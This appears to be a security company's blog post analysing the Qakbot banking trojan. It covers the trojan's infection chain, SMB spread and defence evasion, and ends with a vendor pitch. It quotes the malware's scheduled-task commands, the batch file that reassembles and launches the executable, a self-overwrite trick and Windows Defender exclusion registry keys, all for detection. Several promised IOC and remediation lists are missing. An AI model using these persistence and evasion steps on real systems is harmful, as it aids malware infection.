We have recently been reacquainted with an old “thorn” in the form of an increase in the number of cases involving Qakbot (also known as Qbot). This malware campaign has been around since early 2007 but can still be extremely dangerous, even given its age. With this in mind, we’re sharing some information so that you can protect yourself from this attack.
Qakbot, is essentially a “banking trojan” where the main goal is to harvest information relating to online bank accounts and other related personal information. It’s known to target users of financial services, aiming to steal their login credentials and ultimately empty bank accounts. Although it’s been around for a while, a group of motivated developers keep constantly updating and improving its functionality.
Often the malware's original infection mechanism is via a file dropper malware already on the system or malicious documents delivered through phishing campaigns. We have also seen it introduced through web browser activity in so called “drive bys”. Once infected, the victim’s machine will create a scheduled task, execute a JavaScript downloader that in turn will make a request to one of several hijacked domains for two(2) encrypted data files. Some of the IPs of hijacked domains are detailed on VirusTotal. The aforementioned JavaScript downloader will then decrypt the two encrypted data files storing them on disk and create another scheduled task designed to execute a batch file that in turn will reassemble the malicious Qakbot executable from the two (2) decrypted files stored on disk.
The malware is known to spread through the network via Server Message Block (SMB), a networking facility included in Microsoft Windows systems, commonly used to share files etc. This is achieved using credentials harvested from the infected host system, although the malware does also attempt to “brute-force” logins, using a list of common passwords hardcoded in the malware.
Right, it's about to get a bit technical!
Once a system is infected, the malware campaign will create a scheduled task on the victim machine. This newly created task will attempt to execute a JavaScript downloader that makes a request to one of several hijacked (compromised) domains listed further down this article. The command line string that is used to create this task is:
| C:\Windows\system32\schtasks.exe /create /tn {guid} /tr cmd.exe /C "start /MIN C:\Windows\system32\cscript.exe /E:javascript "C:\Users\<user>\ympoyf.wpl" /sc WEEKLY /D TUE,WED,THU /ST 12:00:00 /F |
Table 1: Create Scheduled task: Download Qakbot
Where the highlighted (Red) section of the command relates to the specific user profile that is “compromised” with the actual filename (with the wpl extension being randomly generated). This scheduled task will execute the following command:
| cmd.exe /C start /MIN C:\Windows\system32\cscript.exe /E:javascript C:\ProgramData\ympoyf.wpl" C:\Windows\system32\cscript.exe /E:javascript C:\ProgramData\ympoyf.wpl |
Table 2: Command Line String: Download Qakbot
This scheduled task executes the JavaScript downloader, 'ympoyf.wpl' in the example above, that makes a request to the URI "/datacollectionservice.php3" from one of the several hijacked domains. The filename for the JavaScript downloader is found in the format of a randomized six(6) character name with the Windows Media Player Playlist (WPL) extension.
The Command and Control (C2) server returns two (2) files of encrypted data that are saved as <random file name>_1.zzz and <random file name>_2.zzz. The aforementioned JavaScript downloader is responsible for decoding the two (2) encrypted data files as well as creating another scheduled task designed to execute a batch file similar to the following:
| @echo off type C:\ProgramData\H1Tzw7GK_1.zzz C:\ProgramData\H1Tzw7GK_2.zzz > C:\ProgramData\H1Tzw7GK.exe start C:\ProgramData\H1Tzw7GK.exe schtasks.exe /Delete /TN H1Tzw7GK.exe /F del /Q /F C:\ProgramData\H1Tzw7GK_1.zzz C:\ProgramData\H1Tzw7GK_2.zzz DEL "%~f0" |
Table 3: Contents of the batch file executed by a malicious scheduled task
This batch file is responsible for reassembling the malicious Qakbot executable from the two (2) decrypted '.zzz' files, using the type command.The type command is available in various command-line interpreters (shells) such as cmd.exe, and Windows PowerShell used to display the contents of specified files on the computer terminal the two (2) '.zzz' files and the scheduled task that were used to execute the batch file are then deleted from the system after the reassembled executable is run.
Upon execution, the malware attempts to evade detection by overwriting itself with the legitimate Windows executable calc.exe using the following command:
| C:\Windows\System32\cmd.exe /c ping.exe -n 6 127.0.0.1 & type C:\WINDOWS\System32\calc.exe > C:\Users\<user>\AppData\Local\Temp\SibKJWE.exe ping.exe -n 6 127.0.0.1 |
Table 4: Command Line String: Ping {Send 6 Echo requests} & overwrite malware with calc.exe
After performing multiple anti-reverse-engineering/Virtual Machine checks, the malware then sleeps for a randomised amount of time before executing its payload. When the payload is executed the malware creates a directory within the user’s roaming profile directory and replicates itself to this directory with a randomised name such as the following;
C:\Users\<user>\AppData\Roaming\Microsoft\Bhzwlg\feulk.exe
The malware then injects itself into the explorer.exe process and creates both a scheduled task and an entry under the following registry key for persistence:
HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\<random>
Finally, it also modifies the following registry entries for Windows Defender to exclude its location from the scanner:
| HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Microsoft AntiMalware\SpyNet HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Microsoft AntiMalware\SpyNet\SpyNetReporting HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Microsoft AntiMalware\SpyNet\SubmitSamplesConsent HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths\C:\Users\Nd9E1FYi\AppData\Roaming\Microsoft\<random> HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows Defender\SpyNet HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows Defender\SpyNet\SpyNetReporting HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows Defender\SpyNet\Su |
Table 5: List of registry entries modified by malware
The following sections document a number of useful IOC's that can be used in order to identify this specific strain of malware within an environment.
The following is a list of registry entries that is modified by malware to exclude itself from the Microsoft Windows Defender antivirus scans.
Please bear in mind that the following Domains and IP addresses may no longer be occupied by malicious actors at the time of reading. Due to the nature of the game, malicious actors are quickly rotating their hijacked domains and IP addresses so as to avoid detection and monitoring.
If your company has been infected, we recommend the following remediation steps :
There no easy answer for this. To avoid infection, it’s up to the user to be conscious of what he/she is installing on their device and be aware of phishing campaigns. We recommend training your staff regarding phishing campaigns and other cybersecurity threats.
Qakbot has been seen in the wild for quite a while now, but this does not mean it’s outdated or dying, in fact it’s evolving and becoming more dangerous than ever. The initial infection, like most malware, depends on the user taking an action, either falling to recognise a phishing campaign or opening a malicious document, therefore it’s worth having an internal education campaign within your organisation to highlight these threats and raise awareness around combating them.
If your organisation is currently infected, or becomes infected, follow our advice on how to remediate immediately. This can be a daunting task and can certainly disrupt your normal day-to-day activities.
We hope the information on this article has helped you understand how Qakbot operates. Following the steps above will help you identify and stop the malware from propagating in your system.
Full disclosure - we’re a cybersecurity company. And this is our very short pitch… Our Proactive Incident Response solution, takes advantage of Serengeti, our in-house technology, to monitor your network and endpoints, while our Threat Intelligence Group (TIG) monitors your system and takes immediate action if a suspicious activity is detected.
With our solution, you’d be able to identify Qakbot and other malware in your system, stopping and removing it. Learn more about Foregenix Proactive IR here.
This blog post was written in collaboration with our Threat Intelligence Group (TIG).